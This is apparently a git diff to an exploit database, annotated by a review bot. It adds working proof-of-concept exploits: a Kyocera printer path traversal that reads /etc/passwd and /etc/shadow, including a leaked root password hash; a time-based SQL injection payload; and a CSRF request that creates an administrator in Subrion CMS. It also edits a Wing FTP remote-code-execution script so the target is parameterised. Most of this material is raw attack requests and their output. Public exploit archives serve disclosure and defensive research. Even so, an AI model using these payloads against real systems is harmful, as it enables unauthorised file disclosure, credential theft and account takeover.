diff --git a/exploits/hardware/webapps/50738.txt b/exploits/hardware/webapps/50738.txt
new file mode 100644
index 000000000..c391a4df6
--- /dev/null
+++ b/exploits/hardware/webapps/50738.txt
@@ -0,0 +1,104 @@
+# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
+# Author: Luis Martinez
+# Discovery Date: 2022-02-10
+# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
+# Tested Version: ECOSYS M2035dn
+# Tested on: Linux
+# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)
+
+# Proof of Concept:
+# 1.- Create a directory traversal payload
+# 2.- Add nullbyte to the end of the payload(%00)
+# 3.- Sent your request
+
+Request 1:
+
+GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
+Cookie: rtl=0
+Host: X.X.X.X
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
+Accept: */*
+
+Response 1:
+
+HTTP/1.1 200 OK
+Content-Length: 844
+Upgrade: TLS/1.0
+Accept-Encoding: identity
+Date: Thu, 10 Feb 2022 15:55:57 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
+ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
+Content-Type: image/jpeg
+
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+adm:x:4:4:adm:/var/adm:/bin/sh
+lp:x:5:7:lp:/var/spool/lpd:/bin/sh
+sync:x:6:8:sync:/bin:/bin/sync
+shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
+halt:x:8:10:halt:/sbin:/sbin/halt
+mail:x:9:11:mail:/var/mail:/bin/sh
+news:x:10:12:news:/var/spool/news:/bin/sh
+uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
+operator:x:12:0:operator:/root:/bin/sh
+games:x:13:60:games:/usr/games:/bin/sh
+ftp:x:15:14:ftp:/var/ftp:/bin/sh
+man:x:16:20:man:/var/cache/man:/bin/sh
+www:x:17:18:www-data:/var/www:/bin/sh
+sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
+proxy:x:19:21:proxy:/bin:/bin/sh
+telnetd:x:20:22:proxy:/bin:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+ais:x:101:101:ais:/var/run/ais:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+
+Request 2:
+
+GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
+Cookie: rtl=0
+Host: X.X.X.X
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
+Accept: */*
+
+Response 2:
+
+HTTP/1.1 200 OK
+Content-Length: 480
+Upgrade: TLS/1.0
+Accept-Encoding: identity
+Date: Thu, 10 Feb 2022 16:10:16 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
+ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
+Content-Type: image/jpeg
+
+root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
+bin:*:15873::::::
+daemon:*:15873::::::
+sys:*:15873::::::
+adm:*:15873::::::
+lp:*:15873::::::
+sync:*:15873::::::
+shutdown:*:15873::::::
+halt:*:15873::::::
+mail:*:15873::::::
+news:*:15873::::::
+uucp:*:15873::::::
+operator:*:15873::::::
+games:*:15873::::::
+ftp:*:15873::::::
+man:*:15873::::::
+www:*:15873::::::
+sshd:*:15873::::::
+proxy:*:15873::::::
+telnetd:*:15873::::::
+backup:*:15873::::::
+ais:*:15873::::::
+nobody:*:15873::::::
\ No newline at end of file
diff --git a/exploits/php/webapps/50736.txt b/exploits/php/webapps/50736.txt
new file mode 100644
index 000000000..187417284
--- /dev/null
+++ b/exploits/php/webapps/50736.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
+# Exploit Author: Alperen Ergel
+# Contact: @alpernae (IG/TW)
+# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
+# Version : 1.0
+# Tested on: windows 10 xammp | Kali linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 09.02.2022
+
+######## Description ########
+#
+#
+# Authenticate and get update user settings will be appear the
+# id paramater put your payload at there it'll be work
+#
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/50737.txt b/exploits/php/webapps/50737.txt
new file mode 100644
index 000000000..4f9a01791
--- /dev/null
+++ b/exploits/php/webapps/50737.txt
@@ -0,0 +1,122 @@
+# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
+# Date: 2022-02-09
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://subrion.org
+# Software Link: https://subrion.org/download
+# Version: 4.2.1
+# Tested on: Windows 10
+
+# [ About - Subrion CMS ]:
+#Subrion is a PHP/MySQL based CMS & framework,
+#that allows you to build websites for any purpose,
+#Yes, from blog to corporate mega portal.
+
+# [ Description ]:
+# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
+# With this vulnerability, authorized users can be added to the system.
+
+# [ Sample CSRF Request ]:
+
+POST /subrion/panel/members/add/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
+Content-Length: 2522
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/subrion/panel/members/add/
+Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="__st"
+
+YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="username"
+
+Aryan
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="fullname"
+
+AryanChehreghani
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="email"
+
+aryanchehreghani@yahoo.com
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="_password"
+
+Test1234!
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="_password2"
+
+Test1234!
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="usergroup_id"
+
+1
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="website"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="phone"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="biography"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="facebook"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="twitter"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="gplus"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="linkedin"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="email_language"
+
+en
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="sponsored"
+
+0
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="featured"
+
+0
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="featured_end"
+
+2022-03-09 12:03
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="status"
+
+active
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="save"
+
+1
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="goto"
+
+list
+-----------------------------386122140640094420852486902--
\ No newline at end of file
diff --git a/exploits/windows/remote/50720.py b/exploits/windows/remote/50720.py
index e455fc9de..86a71ec03 100755
--- a/exploits/windows/remote/50720.py
+++ b/exploits/windows/remote/50720.py
@@ -1,4 +1,4 @@
-# Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)
+# Exploit Title: Wing FTP Server - Authenticated RCE
 # Date: 02/06/2022
 # Exploit Author: notcos
 # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.
@@ -54,7 +54,7 @@ else:
 r = requests.post(url, headers=headers, data=data)
 cookie = 'UIDADMIN=' + r.cookies['UIDADMIN']
 print('Login successful - Cookie: ' + cookie)
- url = "http://172.31.1.20:8080/admin_lua_script.html"
+ url = "http://" + target + ":" + targetport + "/admin_lua_script.html"
 headers = {
 "User-Agent": "Googlebot",
 "Cookie": cookie,
diff --git a/files_exploits.csv b/files_exploits.csv
index 1054b5176..71a967b46 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
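Review bot: The rewritten `url` line in the second hunk of 50720.py relies on `targetport` being a `str`; neither `target` nor `targetport` is defined inside the hunk, so if the argument parsing elsewhere converts the port with `type=int`, the `+` concatenation raises `TypeError` at this line. `url = f"http://{target}:{targetport}/admin_lua_script.html"` accepts either type and reads more clearly; the enclosing `else:` branch starts before the hunk and continues after it. The first hunk's new title drops the version `4.3.8`; if it is not recorded in a `# Version:` header line outside the hunk, keep it somewhere so the tested version stays documented.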
@@ -44797,6 +44797,7 @@ id,file,description,date,author,type,platform,port
 50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,multiple,
 50718,exploits/php/webapps/50718.txt,"Hospital Management System 4.0 - 'multiple' SQL Injection",1970-01-01,nu11secur1ty,webapps,php,
 50719,exploits/php/webapps/50719.txt,"WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50738,exploits/hardware/webapps/50738.txt,"Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
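Review bot: The added `50738` row sits between `50719` and `50721`, while the surrounding rows (and the two rows added in the next hunk at the end of the file) follow ascending id order, so it probably belongs after `50737` in the second hunk. The row also credits `"Luis Martínez"` whereas the new `exploits/hardware/webapps/50738.txt` header reads `# Author: Luis Martinez`; one spelling should be chosen so the index and the file agree. Likewise the `50737` row in the next hunk and its file header both carry `(Add Amin)`, which looks like a typo for `(Add Admin)` and would need correcting in both places at once.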
@@ -44810,3 +44811,5 @@ id,file,description,date,author,type,platform,port
 50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
 50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
 50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50736,exploits/php/webapps/50736.txt,"Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,php,
+50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",1970-01-01,"Aryan Chehreghani",webapps,php,